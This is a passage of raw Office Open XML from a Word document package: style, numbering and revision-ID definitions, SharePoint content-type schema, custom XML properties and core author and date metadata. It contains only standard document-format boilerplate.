    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="703097352">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1896162949">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2082096984">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1638485394">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="432825372">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="781263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60"/>
    <w:rsid w:val="00013634"/>
    <w:rsid w:val="00033B58"/>
    <w:rsid w:val="00064209"/>
    <w:rsid w:val="0006719C"/>
    <w:rsid w:val="000727D4"/>
    <w:rsid w:val="000739C1"/>
    <w:rsid w:val="000767F5"/>
    <w:rsid w:val="00076C83"/>
    <w:rsid w:val="00084DFF"/>
    <w:rsid w:val="000A176C"/>
    <w:rsid w:val="000A399A"/>
    <w:rsid w:val="000A71CE"/>
    <w:rsid w:val="000B1BF7"/>
    <w:rsid w:val="000B2103"/>
    <w:rsid w:val="000D33DC"/>
    <w:rsid w:val="000D47D9"/>
    <w:rsid w:val="00102D9A"/>
    <w:rsid w:val="00112039"/>
    <w:rsid w:val="0011644B"/>
    <w:rsid w:val="0014020D"/>
    <w:rsid w:val="001418FF"/>
    <w:rsid w:val="001459BC"/>
    <w:rsid w:val="00145A87"/>
    <w:rsid w:val="00165515"/>
    <w:rsid w:val="00165D2B"/>
    <w:rsid w:val="0016790F"/>
    <w:rsid w:val="00184E54"/>
    <w:rsid w:val="001B4954"/>
    <w:rsid w:val="001B735B"/>
    <w:rsid w:val="001D2219"/>
    <w:rsid w:val="001D2DC9"/>
    <w:rsid w:val="001D79AD"/>
    <w:rsid w:val="001E1CDC"/>
    <w:rsid w:val="001E7159"/>
    <w:rsid w:val="001F5468"/>
    <w:rsid w:val="00203A84"/>
    <w:rsid w:val="00231ED5"/>
    <w:rsid w:val="00234D79"/>
    <w:rsid w:val="0024133B"/>
    <w:rsid w:val="00247ABC"/>
    <w:rsid w:val="002514AF"/>
    <w:rsid w:val="00257050"/>
    <w:rsid w:val="002572E9"/>
    <w:rsid w:val="002616D6"/>
    <w:rsid w:val="002676DA"/>
    <w:rsid w:val="00267779"/>
    <w:rsid w:val="0027642E"/>
    <w:rsid w:val="002B52FA"/>
    <w:rsid w:val="002B7069"/>
    <w:rsid w:val="002B792A"/>
    <w:rsid w:val="002C3D28"/>
    <w:rsid w:val="002E4B74"/>
    <w:rsid w:val="002E5D89"/>
    <w:rsid w:val="002E68AD"/>
    <w:rsid w:val="002E70AF"/>
    <w:rsid w:val="002F3961"/>
    <w:rsid w:val="00311AB7"/>
    <w:rsid w:val="00314FFB"/>
    <w:rsid w:val="00315311"/>
    <w:rsid w:val="003207D3"/>
    <w:rsid w:val="00327C6D"/>
    <w:rsid w:val="00327E47"/>
    <w:rsid w:val="00333BD5"/>
    <w:rsid w:val="0035200F"/>
    <w:rsid w:val="00360AD0"/>
    <w:rsid w:val="00373988"/>
    <w:rsid w:val="003777A4"/>
    <w:rsid w:val="00387699"/>
    <w:rsid w:val="003A221A"/>
    <w:rsid w:val="003A75F4"/>
    <w:rsid w:val="003A7A55"/>
    <w:rsid w:val="003B34E4"/>
    <w:rsid w:val="003C1BC1"/>
    <w:rsid w:val="003C6158"/>
    <w:rsid w:val="003C7854"/>
    <w:rsid w:val="003D064A"/>
    <w:rsid w:val="003D14D5"/>
    <w:rsid w:val="003D27F8"/>
    <w:rsid w:val="003D36A2"/>
    <w:rsid w:val="003D7B53"/>
    <w:rsid w:val="003E5C85"/>
    <w:rsid w:val="003F61CF"/>
    <w:rsid w:val="00400940"/>
    <w:rsid w:val="00401257"/>
    <w:rsid w:val="00402482"/>
    <w:rsid w:val="00411AE8"/>
    <w:rsid w:val="00431D3E"/>
    <w:rsid w:val="00432AFC"/>
    <w:rsid w:val="00436B84"/>
    <w:rsid w:val="004472EF"/>
    <w:rsid w:val="00464962"/>
    <w:rsid w:val="00473495"/>
    <w:rsid w:val="004768AB"/>
    <w:rsid w:val="0047770C"/>
    <w:rsid w:val="00481CD1"/>
    <w:rsid w:val="004823D3"/>
    <w:rsid w:val="004B1870"/>
    <w:rsid w:val="004B3AF1"/>
    <w:rsid w:val="004B5F5A"/>
    <w:rsid w:val="004C5029"/>
    <w:rsid w:val="004D784D"/>
    <w:rsid w:val="004E6CAE"/>
    <w:rsid w:val="004F748B"/>
    <w:rsid w:val="00514CC4"/>
    <w:rsid w:val="0051633A"/>
    <w:rsid w:val="00523442"/>
    <w:rsid w:val="005248BF"/>
    <w:rsid w:val="00531DF4"/>
    <w:rsid w:val="005425BB"/>
    <w:rsid w:val="0054519A"/>
    <w:rsid w:val="005459BD"/>
    <w:rsid w:val="005478B1"/>
    <w:rsid w:val="005522CE"/>
    <w:rsid w:val="005557E2"/>
    <w:rsid w:val="00555E61"/>
    <w:rsid w:val="00571DA2"/>
    <w:rsid w:val="005727E2"/>
    <w:rsid w:val="00573917"/>
    <w:rsid w:val="00575354"/>
    <w:rsid w:val="00580A14"/>
    <w:rsid w:val="005912C7"/>
    <w:rsid w:val="00591CE2"/>
    <w:rsid w:val="005A009C"/>
    <w:rsid w:val="005A668E"/>
    <w:rsid w:val="005B4F4B"/>
    <w:rsid w:val="005C6255"/>
    <w:rsid w:val="005D5651"/>
    <w:rsid w:val="005D6672"/>
    <w:rsid w:val="006160C4"/>
    <w:rsid w:val="00625847"/>
    <w:rsid w:val="006370D9"/>
    <w:rsid w:val="00645AD4"/>
    <w:rsid w:val="00651B65"/>
    <w:rsid w:val="00657B21"/>
    <w:rsid w:val="006664F9"/>
    <w:rsid w:val="00690E47"/>
    <w:rsid w:val="006947B9"/>
    <w:rsid w:val="006A28ED"/>
    <w:rsid w:val="006C1E9F"/>
    <w:rsid w:val="006D4925"/>
    <w:rsid w:val="006D6E60"/>
    <w:rsid w:val="006F10A0"/>
    <w:rsid w:val="006F2BDB"/>
    <w:rsid w:val="006F3079"/>
    <w:rsid w:val="00703BD4"/>
    <w:rsid w:val="00706A25"/>
    <w:rsid w:val="00712B41"/>
    <w:rsid w:val="00720CC2"/>
    <w:rsid w:val="007256B5"/>
    <w:rsid w:val="007334E6"/>
    <w:rsid w:val="0074073B"/>
    <w:rsid w:val="0074321A"/>
    <w:rsid w:val="0075133B"/>
    <w:rsid w:val="0075650B"/>
    <w:rsid w:val="007605D5"/>
    <w:rsid w:val="00767BCC"/>
    <w:rsid w:val="00784B7B"/>
    <w:rsid w:val="00787FD9"/>
    <w:rsid w:val="007A4CBA"/>
    <w:rsid w:val="007B0D14"/>
    <w:rsid w:val="007B13A6"/>
    <w:rsid w:val="007B25AD"/>
    <w:rsid w:val="007B2F39"/>
    <w:rsid w:val="007B7079"/>
    <w:rsid w:val="007D21E7"/>
    <w:rsid w:val="007E5117"/>
    <w:rsid w:val="007F7587"/>
    <w:rsid w:val="007F7846"/>
    <w:rsid w:val="00811FA7"/>
    <w:rsid w:val="00824138"/>
    <w:rsid w:val="008325E8"/>
    <w:rsid w:val="00842A93"/>
    <w:rsid w:val="00845E10"/>
    <w:rsid w:val="008520DA"/>
    <w:rsid w:val="00855FAE"/>
    <w:rsid w:val="008671DD"/>
    <w:rsid w:val="00874EB8"/>
    <w:rsid w:val="00875299"/>
    <w:rsid w:val="00876E16"/>
    <w:rsid w:val="00876F7A"/>
    <w:rsid w:val="0088105B"/>
    <w:rsid w:val="0088412B"/>
    <w:rsid w:val="00891739"/>
    <w:rsid w:val="008A03A5"/>
    <w:rsid w:val="008A3407"/>
    <w:rsid w:val="008A4AD8"/>
    <w:rsid w:val="008C12FC"/>
    <w:rsid w:val="008E092F"/>
    <w:rsid w:val="008F3833"/>
    <w:rsid w:val="00925B92"/>
    <w:rsid w:val="00927E8F"/>
    <w:rsid w:val="00931FDD"/>
    <w:rsid w:val="0093306C"/>
    <w:rsid w:val="00936D64"/>
    <w:rsid w:val="0094241E"/>
    <w:rsid w:val="0095079B"/>
    <w:rsid w:val="00952DEE"/>
    <w:rsid w:val="009633CA"/>
    <w:rsid w:val="009650D8"/>
    <w:rsid w:val="009800B9"/>
    <w:rsid w:val="00996D55"/>
    <w:rsid w:val="009A16C3"/>
    <w:rsid w:val="009A4549"/>
    <w:rsid w:val="009B1D82"/>
    <w:rsid w:val="009B6E91"/>
    <w:rsid w:val="009B77F6"/>
    <w:rsid w:val="009C278E"/>
    <w:rsid w:val="009C65CA"/>
    <w:rsid w:val="009D2CF2"/>
    <w:rsid w:val="009D7AFB"/>
    <w:rsid w:val="009F79D0"/>
    <w:rsid w:val="00A1080F"/>
    <w:rsid w:val="00A11E00"/>
    <w:rsid w:val="00A1356E"/>
    <w:rsid w:val="00A1509E"/>
    <w:rsid w:val="00A16098"/>
    <w:rsid w:val="00A23BC2"/>
    <w:rsid w:val="00A258B4"/>
    <w:rsid w:val="00A30BFF"/>
    <w:rsid w:val="00A34EA1"/>
    <w:rsid w:val="00A35ED3"/>
    <w:rsid w:val="00A4241F"/>
    <w:rsid w:val="00A46D90"/>
    <w:rsid w:val="00A57ADB"/>
    <w:rsid w:val="00A605E7"/>
    <w:rsid w:val="00A6328F"/>
    <w:rsid w:val="00A6420A"/>
    <w:rsid w:val="00A6486C"/>
    <w:rsid w:val="00A710F4"/>
    <w:rsid w:val="00A772FE"/>
    <w:rsid w:val="00A8123D"/>
    <w:rsid w:val="00A8222B"/>
    <w:rsid w:val="00A82DFF"/>
    <w:rsid w:val="00A919B5"/>
    <w:rsid w:val="00AA40CE"/>
    <w:rsid w:val="00AA7648"/>
    <w:rsid w:val="00AB68CB"/>
    <w:rsid w:val="00AC1C2E"/>
    <w:rsid w:val="00AC257F"/>
    <w:rsid w:val="00AC395E"/>
    <w:rsid w:val="00AD1117"/>
    <w:rsid w:val="00AD66DB"/>
    <w:rsid w:val="00AE54BD"/>
    <w:rsid w:val="00AE6105"/>
    <w:rsid w:val="00AF2EF3"/>
    <w:rsid w:val="00B0044E"/>
    <w:rsid w:val="00B13BD2"/>
    <w:rsid w:val="00B1414F"/>
    <w:rsid w:val="00B15ACC"/>
    <w:rsid w:val="00B277AC"/>
    <w:rsid w:val="00B307C4"/>
    <w:rsid w:val="00B45EF0"/>
    <w:rsid w:val="00B55F76"/>
    <w:rsid w:val="00B566EF"/>
    <w:rsid w:val="00B63A0A"/>
    <w:rsid w:val="00B73140"/>
    <w:rsid w:val="00B807CD"/>
    <w:rsid w:val="00B91294"/>
    <w:rsid w:val="00BA674B"/>
    <w:rsid w:val="00BA6922"/>
    <w:rsid w:val="00BB1A3C"/>
    <w:rsid w:val="00BB1D9C"/>
    <w:rsid w:val="00BB2CFB"/>
    <w:rsid w:val="00BC13BE"/>
    <w:rsid w:val="00BC2280"/>
    <w:rsid w:val="00BC4178"/>
    <w:rsid w:val="00BC56F9"/>
    <w:rsid w:val="00BC7E33"/>
    <w:rsid w:val="00BD79F9"/>
    <w:rsid w:val="00BE43D6"/>
    <w:rsid w:val="00BE77C0"/>
    <w:rsid w:val="00BF1028"/>
    <w:rsid w:val="00BF74F2"/>
    <w:rsid w:val="00C12745"/>
    <w:rsid w:val="00C13EC3"/>
    <w:rsid w:val="00C209E9"/>
    <w:rsid w:val="00C311E2"/>
    <w:rsid w:val="00C3493C"/>
    <w:rsid w:val="00C35013"/>
    <w:rsid w:val="00C36DD8"/>
    <w:rsid w:val="00C41407"/>
    <w:rsid w:val="00C46048"/>
    <w:rsid w:val="00C559F5"/>
    <w:rsid w:val="00C55BC8"/>
    <w:rsid w:val="00C72C72"/>
    <w:rsid w:val="00C82B99"/>
    <w:rsid w:val="00C974CC"/>
    <w:rsid w:val="00C97F79"/>
    <w:rsid w:val="00CA2150"/>
    <w:rsid w:val="00CA33F3"/>
    <w:rsid w:val="00CA3F35"/>
    <w:rsid w:val="00CB7796"/>
    <w:rsid w:val="00CD5E8D"/>
    <w:rsid w:val="00CE3CF2"/>
    <w:rsid w:val="00CE6DEC"/>
    <w:rsid w:val="00CE7BDA"/>
    <w:rsid w:val="00CF0332"/>
    <w:rsid w:val="00D05593"/>
    <w:rsid w:val="00D07ACE"/>
    <w:rsid w:val="00D13938"/>
    <w:rsid w:val="00D146D5"/>
    <w:rsid w:val="00D5111D"/>
    <w:rsid w:val="00D514EC"/>
    <w:rsid w:val="00D54098"/>
    <w:rsid w:val="00D7251D"/>
    <w:rsid w:val="00D9357C"/>
    <w:rsid w:val="00D93676"/>
    <w:rsid w:val="00DA5B33"/>
    <w:rsid w:val="00DA7273"/>
    <w:rsid w:val="00DB2284"/>
    <w:rsid w:val="00DB429F"/>
    <w:rsid w:val="00DB5062"/>
    <w:rsid w:val="00DC088A"/>
    <w:rsid w:val="00DC3338"/>
    <w:rsid w:val="00DC3FC3"/>
    <w:rsid w:val="00DD15D0"/>
    <w:rsid w:val="00DF093A"/>
    <w:rsid w:val="00E05781"/>
    <w:rsid w:val="00E11930"/>
    <w:rsid w:val="00E12B08"/>
    <w:rsid w:val="00E23001"/>
    <w:rsid w:val="00E24BE7"/>
    <w:rsid w:val="00E34FDF"/>
    <w:rsid w:val="00E35793"/>
    <w:rsid w:val="00E47D52"/>
    <w:rsid w:val="00E619C5"/>
    <w:rsid w:val="00E63872"/>
    <w:rsid w:val="00E656D1"/>
    <w:rsid w:val="00E71E3E"/>
    <w:rsid w:val="00E809F5"/>
    <w:rsid w:val="00E82AFB"/>
    <w:rsid w:val="00E85A0F"/>
    <w:rsid w:val="00EB3480"/>
    <w:rsid w:val="00EB487E"/>
    <w:rsid w:val="00EB50B9"/>
    <w:rsid w:val="00EB6587"/>
    <w:rsid w:val="00EC05FA"/>
    <w:rsid w:val="00EC7671"/>
    <w:rsid w:val="00EF1377"/>
    <w:rsid w:val="00EF1BEA"/>
    <w:rsid w:val="00EF4F63"/>
    <w:rsid w:val="00F0400B"/>
    <w:rsid w:val="00F20394"/>
    <w:rsid w:val="00F2357A"/>
    <w:rsid w:val="00F369E5"/>
    <w:rsid w:val="00F37873"/>
    <w:rsid w:val="00F554BC"/>
    <w:rsid w:val="00F927FC"/>
    <w:rsid w:val="00FA2DF4"/>
    <w:rsid w:val="00FB4C8B"/>
    <w:rsid w:val="00FD3B8A"/>
    <w:rsid w:val="00FE2CA4"/>
    <w:rsid w:val="00FF2E66"/>
    <w:rsid w:val="00FF3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2FF0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F1EC9167-C121-43C8-B5AA-13211B8E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22"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006D6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6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E6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D6E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D6E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6E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6E6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6E6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6E6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E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E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E60"/>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D6E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D6E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D6E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D6E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D6E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D6E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D6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E6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D6E6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D6E60"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="006D6E60"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006D6E60"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="006D6E60"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="006D6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E60"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="006D6E60"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="Heading1"/>
    <w:link w:val="Style1Char"/>
    <w:qFormat/>
    <w:rsid w:val="000A71CE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Style1Char">
    <w:name w:val="Style1 Char"/>
    <w:basedOn w:val="Heading1Char"/>
    <w:link w:val="Style1"/>
    <w:rsid w:val="000A71CE"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002676DA"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style2">
    <w:name w:val="Style2"/>
    <w:basedOn w:val="Heading2"/>
    <w:link w:val="Style2Char"/>
    <w:qFormat/>
    <w:rsid w:val="0074321A"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListParagraphChar">
    <w:name w:val="List Paragraph Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="0074321A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Style2Char">
    <w:name w:val="Style2 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="Style2"/>
    <w:rsid w:val="0074321A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style3">
    <w:name w:val="Style3"/>
    <w:basedOn w:val="Heading2"/>
    <w:link w:val="Style3Char"/>
    <w:qFormat/>
    <w:rsid w:val="008A4AD8"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Style3Char">
    <w:name w:val="Style3 Char"/>
    <w:basedOn w:val="Style2Char"/>
    <w:link w:val="Style3"/>
    <w:rsid w:val="008A4AD8"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C41407"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C4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file:///\\WINDOWS01"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D3B3C4E62ACD4D8A259E97CDFB3B7C" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="d8cd5d970bf3f1b12ebf1dec3583e6f5">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="388e204e-8dd1-41bf-bb07-ee740fdf1e1a" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2d24490cbc2a181d10d810b10b4f599c" ns3:_="">
    <xsd:import namespace="388e204e-8dd1-41bf-bb07-ee740fdf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e204e-8dd1-41bf-bb07-ee740fdf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DA6F3-ADA9-4A19-B408-D206599C2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44A3E-FB5F-4EB7-B609-FF1B8B9EB465}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{61FCABE7-5D20-4750-A1A4-B880E4313998}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3CF77BE0-EDBF-411F-A2AB-B65BC4CF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e204e-8dd1-41bf-bb07-ee740fdf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7</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Nam</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyễn Hoàng Nam</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-01T10:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-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3B3C4E62ACD4D8A259E97CDFB3B7C</vt:lpwstr>
  </property>
</Properties>
</file>